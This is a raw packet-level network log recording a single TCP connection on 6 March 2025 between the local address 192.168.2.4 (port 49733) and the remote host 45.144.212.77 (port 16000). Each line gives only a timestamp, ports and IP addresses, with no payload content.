Mar 6, 2025 08:09:12.481318951 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.481340885 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.481395006 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481441975 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.481529951 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481550932 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481563091 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481574059 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481585026 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481595993 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481600046 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.481606960 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481616974 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481627941 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481635094 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.481638908 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481645107 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.481645107 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481656075 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481667042 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481676102 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.481678963 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481693029 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.481725931 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.482105017 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.482116938 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.482126951 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.482140064 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.482151031 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.482153893 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.482163906 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.482184887 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.482194901 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.482196093 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.482208014 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.482223034 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.482245922 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.485124111 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485135078 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485146046 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485157013 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485168934 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485177994 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.485178947 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485192060 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485209942 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485213041 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.485222101 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485233068 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485233068 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.485244989 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485258102 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485269070 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.485299110 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.485359907 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485371113 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485383034 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485394001 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485423088 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.485601902 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485615015 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485625982 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485635996 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485646963 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485652924 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.485657930 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485670090 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485682011 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485687971 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.485728979 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.485759020 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485769987 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485783100 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485805035 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.485816002 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.485816956 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485830069 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485841036 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485847950 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485862017 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485876083 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.485904932 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.485984087 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.485997915 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.486025095 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.486053944 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.486066103 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.486078978 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.486089945 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.486094952 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.486102104 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.486126900 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.486145020 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.506640911 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.556061983 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.556092978 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.556122065 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.556133986 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.556147099 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.556163073 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.556174994 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.556190968 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.556220055 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.556328058 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.556340933 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.556350946 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.556370974 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.556380033 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.556380987 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.556392908 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.556401014 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.556406975 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.556417942 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.556417942 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.556430101 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.556442022 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.556448936 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.556472063 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.569726944 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.569752932 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.569778919 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.569786072 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.569798946 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.569828033 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.569833040 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.569844961 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.569869995 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.569880009 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.569891930 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.569921970 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.569946051 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.569986105 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.569988012 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570009947 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570049047 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.570070028 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570080996 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570118904 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.570214033 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570225000 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570262909 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.570303917 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570314884 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570327997 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570354939 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.570386887 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570398092 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570410013 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570424080 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570511103 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570513964 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.570513964 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.570522070 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570533991 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570544958 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570555925 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570570946 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570584059 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570588112 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.570588112 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.570599079 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.570621014 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570636034 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570647001 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570744038 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.570744038 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.570821047 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570831060 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570842028 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570854902 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570859909 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.570867062 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570879936 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570892096 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570894957 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.570916891 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.570929050 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.570964098 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.570981026 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571002007 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571012974 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571022034 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.571024895 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571034908 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571047068 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571050882 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.571058989 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571069956 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.571070910 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571098089 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.571305990 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571316957 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571327925 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571340084 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571346998 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.571352959 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571362972 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571368933 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.571373940 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571384907 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571396112 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.571397066 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571408987 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571412086 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.571420908 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571432114 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571439028 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.571458101 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.571652889 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571664095 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571676970 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571688890 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571701050 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571717978 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571731091 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571743011 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571754932 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571765900 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571779966 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.571793079 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.571793079 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.571793079 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.571793079 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.571810007 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.571870089 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.571990967 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572002888 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572015047 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572026014 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572037935 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572043896 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.572050095 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572062016 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572062969 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.572073936 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572086096 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572097063 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572103977 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.572108984 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572124958 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.572163105 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.572367907 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572380066 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572392941 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572403908 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572410107 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.572416067 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572424889 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.572427988 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572441101 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572452068 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572453022 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.572463989 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572474957 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572480917 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.572504044 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.572521925 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572535038 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572545052 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572556019 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572565079 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.572567940 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572581053 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572582006 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.572592020 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572602987 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572613001 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.572613955 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572624922 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572633982 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.572637081 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572649002 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572654009 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.572663069 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.572679996 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.572702885 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.573085070 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.573095083 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.573133945 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.576425076 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.580226898 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.646061897 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.646089077 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.646099091 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.646146059 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.646174908 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.646186113 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.646198034 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.646209955 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.646223068 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.646236897 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.646392107 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.646404028 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.646418095 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.646429062 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.646434069 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.646441936 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.646455050 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.646459103 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.646487951 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.646518946 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.646532059 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.646543980 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.646553040 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.646558046 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.646584988 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.659873962 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.659893990 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.659905910 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.659915924 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.659917116 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.659929037 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.659940004 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.659940958 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.659950972 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.659965038 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.659971952 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.659991026 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.659996986 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660007954 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660018921 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660047054 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.660048962 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660089016 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.660105944 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660118103 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660130978 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660151958 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.660175085 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.660196066 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660207987 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660238981 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660250902 CET	16000	49733	45.144.212.77	192.168.2.4
